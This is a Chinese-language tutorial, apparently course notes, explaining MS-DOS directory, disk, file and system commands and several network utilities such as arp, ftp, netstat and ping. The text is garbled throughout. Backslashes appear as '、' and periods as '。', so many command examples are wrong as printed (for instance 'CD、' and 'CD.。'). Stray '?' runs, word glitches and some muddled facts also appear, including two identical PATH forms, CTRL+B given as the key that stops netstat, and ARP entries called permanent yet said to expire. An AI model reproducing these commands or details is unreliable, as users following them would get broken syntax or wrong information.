（1）如果省略路徑和子目錄名則顯示當前目錄； ? ? ? ? ? ? （2）如采用“CD、”格式，則退回到根目錄； ? ? ? ? ? ? （3）如采用“CD.。”格式則退回到上一級目錄。 ? ? ? ? ? ? 例：（1）進入到USER子目錄；（2）從USER子目錄退回到子目錄；（3）返回到根目錄。 ? ? ? ? ? ? C:、＞CD FOX 、USER（進入FOX子目錄下的USER子目錄） ? ? ? ? ? ? C:、FOX、USER＞CD.。 （退回上一級根目錄） ? ? ? ? ? ? C：、FOX＞CD、 （返回到根目錄） ? ? ? ? ? ? C：、＞ ? ? ? ? ? ? （三）RD——刪除子目錄命令 ? ? ? ? ? ? 1．功能：從指定的磁盤刪除了目錄。 ? ? ? ? ? ? 2．類型：內部命令 ? ? ? ? ? ? 3．格式：RD[盤符：][路徑名][子目錄名] ? ? ? ? ? ? 4．使用說明： ? ? ? ? ? ? （1）子目錄在刪除前必須是空的，也就是說需要先進入該子目錄，使用DEL（刪除文件的命令）將其子目錄下的文件刪空，然后再退回到上一級目錄，用RD命令刪除該了目錄本身； ? ? ? ? ? ? （2）不能刪除根目錄和當前目錄。 ? ? ? ? ? ? 例：要求把C盤FOX子目錄下的USER子目錄刪除，操作如下： ? ? ? ? ? ? 第一步：先將USER子目錄下的文件刪空； ? ? ? ? ? ? C、＞DEL C：、FOX、USER、*。* ? ? ? ? ? ? 第二步，刪除USER子目錄。 ? ? ? ? ? ? C、＞RD Ｃ：、FOX、USER ? ? ? ? ? ? （四）DIR——顯示磁盤目錄命令 ? ? ? ? ? ? 1．功能：顯示磁盤目錄的內容。 ? ? ? ? ? ? 2．類型：內部命令 ? ? ? ? ? ? 3．格式：DIR [盤符][路徑] ? ? ? ? ? ? [/W] ? ? ? ? ? ? 4． ? ? ? ? ? ? 使用說明：/P的使用；當欲查看的目錄太多，無法在一屏顯示完屏幕會一直往上卷，不容易看清，加上/P參數后，屏幕上會分面一次顯示23行的文件信息，然后暫停，并提示；Press ? ? ? ? ? ? any key to continue ? ? ? ? ? ? /W的使用：加上/W只顯示文件名，至于文件大小及建立的日期和時間則都省略。加上參數后，每行可以顯示五個文件名。 ? ? ? ? ? ? PATH——路徑設置命令 ? ? ? ? ? ? 1．功能：設備可執行文件的搜索路徑，只對文件有效。 ? ? ? ? ? ? 2．類型：內部命令 ? ? ? ? ? ? 3．格式：PATH[盤符1]目錄[路徑名1]{[；盤符2：]，〈目錄路徑名2〉…} ? ? ? ? ? ? 4．使用說明： ? ? ? ? ? ? （1）當運行一個可執行文件時，DOS會先在當前目錄中搜索該文件，若找到則運行之；若找不到該文件，則根據PATH命令所設置的路徑，順序逐條地到目錄中搜索該文件； ? ? ? ? ? ? （2）PATH命令中的路徑，若有兩條以上，各路徑之間以一個分號“；”隔開； ? ? ? ? ? ? （3）PATH命令有三種使用方法： ? ? ? ? ? ? PATH[盤符1：][路徑1][盤符2：][路徑2]…（設定可執行文件的搜索路徑） ? ? ? ? ? ? PATH：（取消所有路徑） ? ? ? ? ? ? PATH：（顯示目前所設的路徑） ? ? ? ? ? ? （六）TREE——顯示磁盤目錄結構命令 ? ? ? ? ? ? 1．功能：顯示指定驅動器上所有目錄路徑和這些目錄下的所有文件名。 ? ? ? ? ? ? 2．類型：外部命令 ? ? ? ? ? ? 3．格式：TREE[盤符：][/F][》PRN] ? ? ? ? ? ? 4．使用說明： ? ? ? ? ? ? （1）使用/F參數時顯示所有目錄及目錄下的所有文件，省略時，只顯示目錄，不顯示目錄下的文件； ? ? ? ? ? ? （2）選用＞PRN參數時，則把所列目錄及目錄中的文件名打印輸出。 ? ? ? ? ? ? （七）DELTREE——刪除整個目錄命令 ? ? ? ? ? ? 1．功能：將整個目錄及其下屬子目錄和文件刪除。 ? ? ? ? ? ? 2．類型：外部命令 ? ? ? ? ? ? 3．格式：DELTREE[盤符：]〈路徑名〉 ? ? ? ? ? ? 4．使用說明：該命令可以一步就將目錄及其下的所有文件、子目錄、更下層的子目錄一并刪除，而且不管文件的屬性為隱藏、系統或只讀，只要該文件位于刪除的目錄之下，DELTREE都一視同仁，照刪不誤。使用時務必小心！！！ ? ? ? ? ? ? 五、磁盤操作類命令 ? ? ? ? ? ? （一）FORMAT——磁盤格式化命令 ? ? ? ? ? ? 1．功能：對磁盤進行格式化，劃分磁道和扇區；同時檢查出整個磁盤上有無帶缺陷的磁道，對壞道加注標記；建立目錄區和文件分配表，使磁盤作好接收DOS的準備。 ? ? ? ? ? ? 2．類型：外部命令 ? ? ? ? ? ? 3．格式：FORMAT〈盤符：〉[/S][/4][/Q] ? ? ? ? ? ? 4．使用說明： ? ? ? ? ? ? （1）命令后的盤符不可缺省，若對硬盤進行格式化，則會如下列提示：WARNING:ALL DATA ON NON ? ? ? ? ? ? ——REMOVABLE DISK ? ? ? ? ? ? DRIVE C:WILL BE LOST ！ ? ? ? ? ? ? Proceed with Format (Y/N)？ ? ? ? ? ? ? （警告：所有數據在C盤上，將會丟失，確實要繼續格式化嗎？） ? ? ? ? ? ? （2）若是對軟盤進行格式化，則會如下提示：Insert mew diskette for drive A; ? ? ? ? ? ? and press ENTER when ready… ? ? ? ? ? ? （在A驅中插入新盤，準備好后按回車鍵）。 ? ? ? ? ? ? （3）選用[/S]參數，將把DOS系統文件IO.SYS ? ? ? ? ? ? 、MSDOS.SYS及COMMAND.COM復制到磁盤上，使該磁盤可以做為DOS啟動盤。若不選用/S參數，則格式化后的磙盤只能讀寫信息，而不能做為啟動盤； ? ? ? ? ? ? （4）選用[/4]參數，在1.2MB的高密度軟驅中格式化360KB的低密度盤； ? ? ? ? ? ? （5）選用[/Q]參數，快速格式化，這個參數并不會重新劃分磁盤的磁道貌岸然和扇區，只能將磁盤根目錄、文件分配表以及引導扇區清成空白，因此，格式化的速度較快。 ? ? ? ? ? ? （6）選用參數，表示無條件格式化，即破壞原來磁盤上所有數據。不加/U，則為安全格式化，這時先建立一個鏡象文件保存原來的FAT表和根目錄，必要時可用UNFORRMAT恢復原來的數據。 ? ? ? ? ? ? （二）UNFORMAT恢復格式化命令 ? ? ? ? ? ? 1．功能：對進行過格式化誤操作丟失數據的磁盤進行恢復。 ? ? ? ? ? ? 2．類型：外部命令 ? ? ? ? ? ? 3．格式：UNFORMAT〈盤符〉[/L] ? ? ? ? ? ? [/TEST] ? ? ? ? ? ? 4．使用說明：用于將被“非破壞性”格式化的磁盤恢復。根目錄下被刪除的文件或子目錄及磁盤的系統扇區（包括FAT、根目錄、BOOT扇區及硬盤分區表）受損時，也可以用UNFORMAT來搶救。 ? ? ? ? ? ? （1）選用/L參數列出找到的子目錄名稱、文件名稱、大孝日期等信息，但不會真的做FORMAT工作。 ? ? ? ? ? ? （2）選用/P參數將顯示于屏幕的報告（包含/L參數所產生的信息）同時也送到打印機。運行時屏幕會顯示：“Print out ? ? ? ? ? ? will be sent to LPT1” ? ? ? ? ? ? （3）選用/TEST參數只做模擬試驗（TEST）不做真正的寫入動作。使用此參數屏幕會顯示：“Simulation only” ? ? ? ? ? ? （4）選用/U參數不使用MIRROR映像文件的數據，直接根據磁盤現狀進行UNFORMAT。 ? ? ? ? ? ? （5）選用/PSRTN；修復硬盤分區表。 ? ? ? ? ? ? 若在盤符之后加上/P、/L、/TEST之一，都相當于使用了/U參數，UNFORMAT會“假設”此時磁盤沒有MIRROR映像文件。 ? ? ? ? ? ? 注意：UNFORMAT對于剛FORMAT的磁盤，可以完全恢復，但FORMAT后若做了其它數據的寫入，則UNFORMAT就不能完整的救回數據了。UNFORMAT并非是萬能的，由于使用UNFORMAT會重建FAT與根目錄，所以它也具有較高的危險性，操作不當可能會擴大損失，如果僅誤刪了幾個文件或子目錄，只需要利用UNDELETE就夠了。 ? ? ? ? ? ? 三） CHKDSK——檢查磁盤當前狀態命令 ? ? ? ? ? ? 1．功能：顯示磁盤狀態、內存狀態和指定路徑下指定文件的不連續數目。 ? ? ? ? ? ? 2．類型：外部命令 ? ? ? ? ? ? 3．格式：CHKDSK [盤符：][路徑][文件名][/F][/V] ? ? ? ? ? ? 4．使用說明： ? ? ? ? ? ? （1）選用[文件名]參數，則顯示該文件占用磁盤的情況； ? ? ? ? ? ? （2）選[/F]參數，糾正在指定磁盤上發現的邏輯錯誤； ? ? ? ? ? ? （3）選用[/V]參數，顯示盤上的所有文件和路徑。 ? ? ? ? ? ? （四）DISKCOPY——整盤復制命令 ? ? ? ? ? ? 1．功能：復制格式和內容完全相同的軟盤。 ? ? ? ? ? ? 2．類型：外部命令 ? ? ? ? ? ? 3．格式：DISKCOPY[盤符1：][盤符2：] ? ? ? ? ? ? 4．使用說明： ? ? ? ? ? ? （1）如果目標軟盤沒有格式化，則復制時系統自動選進行格式化。 ? ? ? ? ? ? （2）如果目標軟盤上原有文件，則復制后將全部丟失。 ? ? ? ? ? ? （3）如果是單驅動器復制，系統會提示適時更換源盤和目標盤，請操作時注意分清源盤和目標盤。 ? ? ? ? ? ? （五）LABEL——建立磁盤卷標命令 ? ? ? ? ? ? 1．功能：建立、更改、刪除磁盤卷標。 ? ? ? ? ? ? 2．類型：外部命令 ? ? ? ? ? ? 3．格式：LABEL[盤符：][卷標名] ? ? ? ? ? ? 4．使用說明： ? ? ? ? ? ? （1）卷標名為要建立的卷標名，若缺省此參數，則系統提示鍵入卷標名或詢問是否刪除原有的卷標名； ? ? ? ? ? ? （2）卷標名由1至11個字符組成。 ? ? ? ? ? ? （六）VOL——顯示磁盤卷標命令 ? ? ? ? ? ? 1．功能：查看磁盤卷標號。 ? ? ? ? ? ? 2．類型：內部命令 ? ? ? ? ? ? 3．格式：VOL[盤符：] ? ? ? ? ? ? 4．使用說明：省略盤符，顯示當前驅動器卷標。 ? ? ? ? ? ? （七）SCANDISK——檢測、修復磁盤命令 ? ? ? ? ? ? 1．功能：檢測磁盤的FAT表、目錄結構、文件系統等是否有問題，并可將檢測出的問題加以修復。 ? ? ? ? ? ? 2．類型：外部命令 ? ? ? ? ? ? 3．格式：SCANDISK[盤符1：]{[盤符2：]…}[/ALL] ? ? ? ? ? ? 4．使用說明： ? ? ? ? ? ? （1）CCANDISK適用于硬盤和軟盤，可以一次指定多個磁盤或選用[/ALL]參數指定所有的磁盤； ? ? ? ? ? ? （2）可自動檢測出磁盤中所發生的交*連接、丟失簇和目錄結構等邏輯上的錯誤，并加以修復。 ? ? ? ? ? ? （八）DEFRAG——重整磁盤命令 ? ? ? ? ? ? 1．。功能：整理磁盤，消除磁盤碎塊。 ? ? ? ? ? ? 2．類型：外部命令 ? ? ? ? ? ? 3．格式：DEFRAG[盤符：][/F] ? ? ? ? ? ? 4．使用說明：選用/F參數，將文件中存在盤上的碎片消除，并調整磁盤文件的安排，確保文件之間毫無空隙。從而加快讀盤速度和節省磁盤空間。 ? ? ? ? ? ? （九）SYS——系統復制命令 ? ? ? ? ? ? 1．功能：將當前驅動器上的DOS系統文件IO.SYS,MSDOS.SYS和COMMAND.COM 傳送到指定的驅動器上。 ? ? ? ? ? ? 2．類型：外部命令 ? ? ? ? ? ? 3．格式：SYS[盤符：] ? ? ? ? ? ? *使用說明：如果磁盤剩余空間不足以存放系統文件，則提示：No roomfor on destination disk. ? ? ? ? ? ? 文件操作類命令 ? ? ? ? ? ? （一） COPY文件復制命令 ? ? ? ? ? ? 1．功能：拷貝一個或多個文件到指定盤上。 ? ? ? ? ? ? 2．類型：內部命令 ? ? ? ? ? ? 3．格式：COPY [源盤][路徑]〈源文件名〉[目標盤][路徑][目標文件名] ? ? ? ? ? ? 4．使用說明： ? ? ? ? ? ? （1）COPY是文件對文件的方式復制數據，復制前目標盤必須已經格式化； ? ? ? ? ? ? （2）復制過程中，目標盤上相同文件名稱的舊文件會被源文件取代； ? ? ? ? ? ? （3）復制文件時，必須先確定目標般有足夠的空間，否則會出現；insufficient的錯誤信息，提示磁盤空間不夠； ? ? ? ? ? ? （4）文件名中允許使用通配舉“*”“？”，可同時復制多個文件； ? ? ? ? ? ? （5）COPY命令中源文件名必須指出，不可以省略。 ? ? ? ? ? ? （6）復制時，目標文件名可以與源文件名相同，稱作“同名拷貝”此時目標文件名可以省略； ? ? ? ? ? ? （7）復制時，目標文件名也可以與源文件名不相同，稱作“異名拷貝”，此時，目標文件名不能省略； ? ? ? ? ? ? （8）復制時，還可以將幾個文件合并為一個文件，稱為“合并拷貝”，格式如下：COPY；[源盤][路徑]〈源文件名1〉〈源文件名2〉…[目標盤][路徑]〈目標文件名〉； ? ? ? ? ? ? （9）利用COPY命令，還可以從鍵盤上輸入數據建立文件，格式如下：COPY CON [盤符：][路徑]〈文件名〉； ? ? ? ? ? ? （10）注意：COPY命令的使用格式，源文件名與目標文件名之間必須有空格！ ? ? ? ? ? ? （二）XCOPY——目錄復制命令 ? ? ? ? ? ? 1．功能：復制指定的目錄和目錄下的所有文件連同目錄結構。 ? ? ? ? ? ? 2．類型：外部命令 ? ? ? ? ? ? 3．格式：XCOPY [源盤：]〈源路徑名〉[目標盤符：][目標路徑名][/S][/V][/E] ? ? ? ? ? ? 4．使用說明： ? ? ? ? ? ? （1）XCOPY是COPY的擴展，可以把指定的目錄連文件和目錄結構一并拷貝，但不能拷貝隱藏文件和系統文件； ? ? ? ? ? ? （2）使用時源盤符、源目標路徑名、源文件名至少指定一個； ? ? ? ? ? ? （3）選用/S時對源目錄下及其子目錄下的所有文件進行COPY。除非指定/E參數，否則/S不會拷貝空目錄，若不指定/S參數，則XCOPY只拷貝源目錄本身的文件，而不涉及其下的子目錄； ? ? ? ? ? ? （4）選用/V參數時，對的拷貝的扇區都進行較驗，但速度會降低。 ? ? ? ? ? ? （三）TYPE——顯示文件內容命令 ? ? ? ? ? ? 1．功能：顯示ASCII碼文件的內容。 ? ? ? ? ? ? 2．類型：內部命令。 ? ? ? ? ? ? 3．格式：TYPE[盤符：][路徑]〈文件名〉 ? ? ? ? ? ? 4．使用說明： ? ? ? ? ? ? （1）顯示由ASCII碼組成的文本文件，對。EXE.COM等為擴展名的文件，其顯示的內容是無法閱讀的，沒有實際意義2； ? ? ? ? ? ? （2）該命令一次只可以顯示一個文件的內容，不能使用通配符； ? ? ? ? ? ? （3）如果文件有擴展名，則必須將擴展名寫上； ? ? ? ? ? ? （4）當文件較長，一屏顯示不下時，可以按以下格式顯示；TYPE[盤符：][路徑]〈文件名〉│MORE，MORE為分屏顯示命令，使用些參數后當滿屏時會暫停，按任意鍵會繼續顯示。 ? ? ? ? ? ? （5）若需將文件內容打印出來，可用如下格式： ? ? ? ? ? ? TYPE[盤符：][路徑]〈文件名〉，＞PRN ? ? ? ? ? ? 此時，打印機應處于聯機狀態。 ? ? ? ? ? ? （四） REN——文件改名命令 ? ? ? ? ? ? 1．功能：更改文件名稱 ? ? ? ? ? ? 2．類型：內部命令 ? ? ? ? ? ? 3．格式：REN[盤符：][路徑]〈舊文件名〉〈新文件名〉 ? ? ? ? ? ? 4．使用說明： ? ? ? ? ? ? （1）新文件名前不可以加上盤符和路徑，因為該命令只能對同一盤上的文件更換文件名； ? ? ? ? ? ? （2）允許使用通配符更改一組文件名或擴展名。 ? ? ? ? ? ? （五）FC——文件比較命令 ? ? ? ? ? ? 1．功能：比較文件的異同，并列出差異處。 ? ? ? ? ? ? 2．類型：外部命令 ? ? ? ? ? ? 3．格式：FC[盤符：][路徑名]〈文件名〉[盤符：][路徑名][文件名][/A][/C][/N] ? ? ? ? ? ? 4．使用說明： ? ? ? ? ? ? （1）選用/A參數，為ASCII碼比較模式； ? ? ? ? ? ? （2）選用/B參數，為二進制比較模式； ? ? ? ? ? ? （3）選用/C參數，將大小寫字符看成是相同的字符。 ? ? ? ? ? ? （4）選用/N參數，在ASCII碼比較方式下，顯示相異處的行號。 ? ? ? ? ? ? （六）ATTRIB——修改文件屬性命令 ? ? ? ? ? ? 1．功能：修改指定文件的屬性。（文件屬性參見2.5.4（二）文件屬性一節） ? ? ? ? ? ? 2．類型：外部命令。 ? ? ? ? ? ? 3．格式：ATTRIB[文件名][R][——R][A][——A][H][——H][S][——S][/S] ? ? ? ? ? ? 4．使用說明： ? ? ? ? ? ? （1）選用R參數，將指定文件設為只讀屬性，使得該文件只能讀取，無法寫入數據或刪除；選用——R參數，去除只讀屬性； ? ? ? ? ? ? （2）選用A參數，將文件設置為檔案屬性；選用——A參數，去除檔案屬性； ? ? ? ? ? ? （3）選用H參數，將文件調協為隱含屬性；選用——H參數，去隱含屬性； ? ? ? ? ? ? （4）選用S參數，將文件設置為系統屬性；選用——S參數，去除系統屬性； ? ? ? ? ? ? （5）選用/S參數，對當前目錄下的所有子目錄及作設置。 ? ? ? ? ? ? 七） DEL——刪除文件命令 ? ? ? ? ? ? 1．功能：刪除指定的文件。 ? ? ? ? ? ? 2．類型：內部命令 ? ? ? ? ? ? 3．格式：DEL[盤符：][路徑]〈文件名〉 ? ? ? ? ? ? 4．使用說明： ? ? ? ? ? ? （1）選用/P參數，系統在刪除前詢問是否真要刪除該文件，若不使用這個參數，則自動刪除； ? ? ? ? ? ? （2）該命令不能刪除屬性為隱含或只讀的文件； ? ? ? ? ? ? （3）在文件名稱中可以使用通配符； ? ? ? ? ? ? （4）若要刪除磁盤上的所有文件（DEL*·*或DEL·），則會提示：(Arey ou ? ? ? ? ? ? sure？）（你確定嗎？）若回答Y，則進行刪除，回答N，則取消此次刪除作業。 ? ? ? ? ? ? （八） UNDELETE——恢復刪除命令 ? ? ? ? ? ? 1．功能：恢復被誤刪除命令 ? ? ? ? ? ? 2．類型：外部命令。 ? ? ? ? ? ? 3．格式：UNDELETE[盤符：][路徑名]〈文件名〉[/DOS]/LIST][/ALL] ? ? ? ? ? ? 4．使用說明：使用UNDELETE可以使用“*”和“？”通配符。 ? ? ? ? ? ? （1）選用/DOS參數根據目錄里殘留的記錄來恢復文件。由于文件被刪除時，目錄所記載斬文件名第一個字符會被改為E5，DOS即依據文件開頭的E5和其后續的字符來找到欲恢復的文件，所以，UNDELETE會要求用戶輸入一個字符，以便將文件名字補齊。但此字符不必和原來的一樣，只需符合DOS的文件名規則即可。 ? ? ? ? ? ? （2）選用/LIST只“列出”符合指定條件的文件而不做恢復，所以對磁盤內容完全不會有影響。 ? ? ? ? ? ? （3）選用/ALL自動將可完全恢復的文件完全恢復，而不一一地詢問用戶，使用此參數時，若UNDELTE利用目錄里殘留的記錄來將文件恢復，則會自動選一個字符將文件名補齊，并且使其不與現存文件名相同，選用字符的優選順序為：#%——0000123456789A~Z。 ? ? ? ? ? ? UNDELETE還具有建立文件的防護措施的功能，已超出本課程授課范圍，請讀者在使用些功能時查閱有關DOS手冊。 ? ? ? ? ? ? 七、其它命令 ? ? ? ? ? ? （一）CLS——清屏幕命令 ? ? ? ? ? ? 1功能：清除屏幕上的所有顯示，光標置于屏幕左上角。 ? ? ? ? ? ? 2類型：內部命令 ? ? ? ? ? ? 3格式：CLS ? ? ? ? ? ? （二） VER查看系統版本號命令 ? ? ? ? ? ? 1功能：顯示當前系統版本號 ? ? ? ? ? ? 2類型：內部命令 ? ? ? ? ? ? 3格式：VER ? ? ? ? ? ? （三） DATA日期設置命令 ? ? ? ? ? ? 1功能：設置或顯示系統日期。 ? ? ? ? ? ? 2類型：內部命令 ? ? ? ? ? ? 3格式：DATE[mm——dd——yy] ? ? ? ? ? ? 4使用說明： ? ? ? ? ? ? （1）省略[mm——dd——yy]顯示系統日期并提示輸入新的日期，不修改則可直接按回車鍵，[mm——dd——yy]為“月月——日日——年年”格式； ? ? ? ? ? ? （2）當機器開始啟動時，有自動處理文件（AUTOEXEC.BAT）被執行，則系統不提示輸入系統日期。否則，提示輸入新日期和時間。 ? ? ? ? ? ? （四） TIME系統時鐘設置命令 ? ? ? ? ? ? 1功能：設置或顯示系統時期。 ? ? ? ? ? ? 2類型：內部命令 ? ? ? ? ? ? 3格式：TIME[hh：mm：ss：xx] ? ? ? ? ? ? 4使用說明： ? ? ? ? ? ? （1）省略[hh：mm：ss：xx]，顯示系統時間并提示輸入新的時間，不修改則可直接按回車鍵，[hh：mm：ss：xx]為“小時：分鐘：秒：百分之幾秒”格式； ? ? ? ? ? ? （2）當機器開始啟動時，有自動處理文件（AUTOEXEC.BAT）被執行，則系統不提示輸入系統日期。否則，提示輸入新日期和時間。 ? ? ? ? ? ? （五）MEM查看當前內存狀況命令 ? ? ? ? ? ? 1功能：顯示當前內存使用的情況 ? ? ? ? ? ? 2類型：外部命令 ? ? ? ? ? ? 3格式：MEM[/C][/F][/M] ? ? ? ? ? ? 4使用說明： ? ? ? ? ? ? （1）選用/C參數列出裝入常規內存和CMB的各文件的長度，同時也顯示內存空間的使用狀況和最大的可用空間； ? ? ? ? ? ? （2）選用/F參數分別列出當前常規內存剩余的字節大小和UMB可用的區域及大小； ? ? ? ? ? ? （3）選用/M參數顯示該模塊使用內存地地址、大小及模塊性質； ? ? ? ? ? ? （4）選用/P參數指定當輸出超過一屏時，暫停供用戶查看。 ? ? ? ? ? ? （六） MSD顯示系統信息命令 ? ? ? ? ? ? 1功能：顯示系統的硬件和操作系統的狀況。 ? ? ? ? ? ? 2類型：外部命令 ? ? ? ? ? ? 3格式：MSD[/S] ? ? ? ? ? ? 4使用說明： ? ? ? ? ? ? （1）選用/I參數時，不檢測硬件； ? ? ? ? ? ? （2）選用/B參數時，以黑白方式啟動MSD； ? ? ? ? ? ? （3）選用/S參數時，顯示出簡明的系統報告。 ? ? ? ? ? ? DOS下常用網絡相關命令 ? ? ? ? ? ? Arp： 顯示和修改“地址解析協議”(ARP) 所使用的到以太網的 IP 或令牌環物理地址翻譯 ? ? ? ? ? ? 表。該命令只有在安裝了 TCP/IP 協議之后才可使用 ? ? ? ? ? ? arp -a [inet_addr] [-N [if_addr]] ? ? ? ? ? ? arp -d inet_addr [if_addr] ? ? ? ? ? ? arp -s inet_addr ether_addr [if_addr] ? ? ? ? ? ? 參數 ? ? ? ? ? ? -a 通過詢問 TCP/IP 顯示當前 ARP 項。如果指定了 inet_addr，則只顯示指定計算 ? ? ? ? ? ? 機的 IP 和物理地址。 ? ? ? ? ? ? -g 與 -a 相同。 ? ? ? ? ? ? inet_addr 以加點的十進制標記指定 IP 地址。 ? ? ? ? ? ? -N 顯示由 if_addr 指定的網絡界面 ARP 項。 ? ? ? ? ? ? if_addr 指定需要修改其地址轉換表接口的 IP 地址（如果有的話）。如果不存在，將使用第 ? ? ? ? ? ? 一個可適用的接口。 ? ? ? ? ? ? -d 刪除由 inet_addr 指定的項。 ? ? ? ? ? ? -s 在 ARP 緩存中添加項，將 IP 地址 inet_addr 和物理地址 ether_addr 關聯。物 ? ? ? ? ? ? 理地址由以連字符分隔的 6 個十六進制字節給定。使用帶點的十進制標記指定 IP ? ? ? ? ? ? 地址。項是永久性的，即在超時到期后項自動從緩存刪除。 ? ? ? ? ? ? ether_addr 指定物理地址。 ? ? ? ? ? ? -------------------------------------------- ? ? ? ? ? ? Finger 在運行 Finger 服務的指定系統上顯示有關用戶的信息。根據遠程系統輸出不同的變 ? ? ? ? ? ? 量。該命令只有在安裝了 TCP/IP 協議之后才可用。 ? ? ? ? ? ? finger [-l] [user]@computer[...] ? ? ? ? ? ? 參數 ? ? ? ? ? ? -l 以長列表格式顯示信息。 ? ? ? ? ? ? user 指定要獲得相關信息的用戶。省略用戶參數以顯示指定計算機上所有用戶的信息： ? ? ? ? ? ? @computer ? ? ? ? ? ? -------------------------------------------- ? ? ? ? ? ? Ftp 將文件傳送到正在運行 FTP 服務的遠程計算機或從正在運行 FTP 服務的遠程計算機 ? ? ? ? ? ? 傳送文件（有時稱作 daemon）。Ftp 可以交互使用。單擊“相關主題”列表中的 ? ? ? ? ? ? “ftp 命令”以獲得可用的“ftp”子命令描述。該命令只有在安裝了 TCP/IP 協議 ? ? ? ? ? ? 之后才可用。Ftp 是一種服務，一旦啟動，將創建在其中可以使用 ftp 命令的子環 ? ? ? ? ? ? 境，通過鍵入 quit 子命令可以從子環境返回到 Windows 2000 命令提示符。當 ? ? ? ? ? ? ftp 子環境運行時，它由 ftp 命令提示符代表。 ? ? ? ? ? ? ftp [-v] [-n] [-i] [-d] [-g] [-s:filename] [-a] ? ? ? ? ? ? [-w:windowsize] [computer] ? ? ? ? ? ? 參數 ? ? ? ? ? ? -v 禁止顯示遠程服務器響應。 ? ? ? ? ? ? -n 禁止自動登錄到初始連接。 ? ? ? ? ? ? -i 多個文件傳送時關閉交互提示。 ? ? ? ? ? ? -d 啟用調試、顯示在客戶端和服務器之間傳遞的所有 ftp 命令。 ? ? ? ? ? ? -g 禁用文件名組，它允許在本地文件和路徑名中使用通配符字符（* 和 ?）。（請參閱 ? ? ? ? ? ? 聯機“命令參考”中的 glob 命令。） ? ? ? ? ? ? -s: filename 指定包含 ftp 命令的文本文件；當 ftp 啟動后，這些命令將自動運行。該參數中 ? ? ? ? ? ? 不允許有空格。使用該開關而不是重定向 (>)。 ? ? ? ? ? ? -a 在捆綁數據連接時使用任何本地接口。 ? ? ? ? ? ? -w:windowsize 替代默認大小為 4096 的傳送緩沖區。 ? ? ? ? ? ? computer 指定要連接到遠程計算機的計算機名或 IP 地址。如果指定，計算機必須是行的最 ? ? ? ? ? ? 后一個參數。 ? ? ? ? ? ? -------------------------------------------- ? ? ? ? ? ? Nbtstat 該診斷命令使用 NBT（TCP/IP 上的 NetBIOS）顯示協議統計和當前 TCP/IP 連 ? ? ? ? ? ? 接。該命令只有在安裝了 TCP/IP 協議之后才可用。 nbtstat [-a remotename] [-A IP ? ? ? ? ? ? address] [-c] [-n] [-R] [-r] [-S] [-s] [interval] ? ? ? ? ? ? 參數 ? ? ? ? ? ? -a remotename 使用遠程計算機的名稱列出其名稱表。 ? ? ? ? ? ? -A IP address 使用遠程計算機的 IP 地址并列出名稱表。 ? ? ? ? ? ? -c 給定每個名稱的 IP 地址并列出 NetBIOS 名稱緩存的內容。 ? ? ? ? ? ? -n 列出本地 NetBIOS 名稱。“已注冊”表明該名稱已被廣播 (Bnode) 或者 WINS（其 ? ? ? ? ? ? 他節點類型）注冊。 ? ? ? ? ? ? -R 清除 NetBIOS 名稱緩存中的所有名稱后，重新裝入 Lmhosts 文件。 ? ? ? ? ? ? -r 列出 Windows 網絡名稱解析的名稱解析統計。在配置使用 WINS 的 Windows ? ? ? ? ? ? 2000 計算機上，此選項返回要通過廣播或 WINS 來解析和注冊的名稱數。 ? ? ? ? ? ? -S 顯示客戶端和服務器會話，只通過 IP 地址列出遠程計算機。 ? ? ? ? ? ? -s 顯示客戶端和服務器會話。嘗試將遠程計算機 IP 地址轉換成使用主機文件的名 ? ? ? ? ? ? 稱。 ? ? ? ? ? ? interval 重新顯示選中的統計，在每個顯示之間暫停 interval 秒。按 CTRL+C 停止重新 ? ? ? ? ? ? 顯示統計信息。如果省略該參數，nbtstat 打印一次當前的配置信息。 ? ? ? ? ? ? -------------------------------------------- ? ? ? ? ? ? Netstat 顯示協議統計和當前的 TCP/IP 網絡連接。該命令只有在安裝了 TCP/IP 協議后 ? ? ? ? ? ? 才可以使用。 ? ? ? ? ? ? netstat [-a] [-e] [-n] [-s] [-p protocol] [-r] [interval] ? ? ? ? ? ? 參數 ? ? ? ? ? ? -a 顯示所有連接和偵聽端口。服務器連接通常不顯示。 ? ? ? ? ? ? -e 顯示以太網統計。該參數可以與 -s 選項結合使用。 ? ? ? ? ? ? -n 以數字格式顯示地址和端口號（而不是嘗試查找名稱）。 ? ? ? ? ? ? -s 顯示每個協議的統計。默認情況下，顯示 TCP、UDP、ICMP 和 IP 的統計。-p 選 ? ? ? ? ? ? 項可以用來指定默認的子集。 ? ? ? ? ? ? -p protocol 顯示由 protocol 指定的協議的連接；protocol 可以是 tcp 或 udp。如果與 - ? ? ? ? ? ? s選項一同使用顯示每個協議的統計，protocol 可以是 tcp、udp、icmp 或ip。 ? ? ? ? ? ? -r 顯示路由表的內容。 ? ? ? ? ? ? interval 重新顯示所選的統計，在每次顯示之間暫停 interval 秒。按 CTRL+B 停止重新 ? ? ? ? ? ? 顯示統計。如果省略該參數，netstat 將打印一次當前的配置信息。 ? ? ? ? ? ? -------------------------------------------- ? ? ? ? ? ? Ping 驗證與遠程計算機的連接。該命令只有在安裝了 TCP/IP 協議后才可以使用。 ? ? ? ? ? ? ping [-t] [-a] [-n count] [-l length] [-f] [-i ttl] [-v tos] ? ? ? ? ? ? [-r count] [-s count] [[-j computer-list] │ [-k ? ? ? ? ? ? computer-list]] [-w timeout] destination-list ? ? ? ? ? ? 參數 ? ? ? ? ? ? -t Ping 指定的計算機直到中斷。 -a 將地址解析為計算機名。 ? ? ? ? ? ? -n count 發送 count 指定的 ECHO 數據包數。默認值為 4。 ? ? ? ? ? ? -l length 發送包含由 length 指定的數據量的 ECHO 數據包。默認為 32 字節；最大值是 ? ? ? ? ? ? 65,527。 ? ? ? ? ? ? -f 在數據包中發送“不要分段”標志。數據包就不會被路由上的網關分段。 ? ? ? ? ? ? -i ttl 將“生存時間”字段設置為 ttl 指定的值。 ? ? ? ? ? ? -v tos 將“服務類型”字段設置為 tos 指定的值。 ? ? ? ? ? ? -r count 在“記錄路由”字段中記錄傳出和返回數據包的路由。count 可以指定最少 1 臺， ? ? ? ? ? ? 最多 9 臺計算機。 ? ? ? ? ? ? -s count 指定 count 指定的躍點數的時間戳。 ? ? ? ? ? ? -j computer-list 利用 computer-list 指定的計算機列表路由數據包。連續計算機可以被中 ? ? ? ? ? ? 間網關分隔（路由稀疏源）IP 允許的最大數量為 9。 ? ? ? ? ? ? -k computer-list 利用 computer-list 指定的計算機列表路由數據包。連續計算機不能被中 ? ? ? ? ? ? 間網關分隔（路由嚴格源）IP 允許的最大數量為 9。 ? ? ? ? ? ? -w timeout 指定超時間隔，單位為毫秒。 ? ? ? ? ? ? destination-list 指定要 ping 的遠程計算機。 ? ? ? ? ? ? 